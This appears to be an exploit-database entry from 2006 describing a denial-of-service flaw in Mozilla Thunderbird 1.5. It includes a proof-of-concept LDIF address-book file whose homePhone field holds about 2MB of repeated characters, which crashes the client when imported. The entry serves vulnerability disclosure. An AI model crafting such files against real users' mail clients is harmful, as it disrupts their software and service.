vendor:
Thunderbird
by:
DrFrancky
7.5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: Thunderbird
Affected Version From: Mozilla Thunderbird 1.5
Affected Version To: Other versions may be vulnerable as well
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
Mozilla Thunderbird Remote Denial of Service Vulnerability
Mozilla Thunderbird is prone to a remote denial-of-service vulnerability. The issue presents itself when the application handles a specially crafted address book file. POC: create a file.ldif and insert following then import it in address book: n: cn=Test POC by DrFrancky@securax.org,mail=drfrancky@securax.org objectclass: top objectclass: person objectclass: organizationalPerson objectclass: inetOrgPerson objectclass: mozillaAbPersonAlpha givenName: Test sn: POC by DrFrancky@securax.org cn: POC by DrFrancky@securax.org mozillaNickname: DrFrancky mail: drfrancky@securax.org nsAIMid: DrFrancky POC modifytimestamp: 0Z homePhone: aaaaaaaaaaaaaaa[2MB of 'a']
Mitigation:
N/A
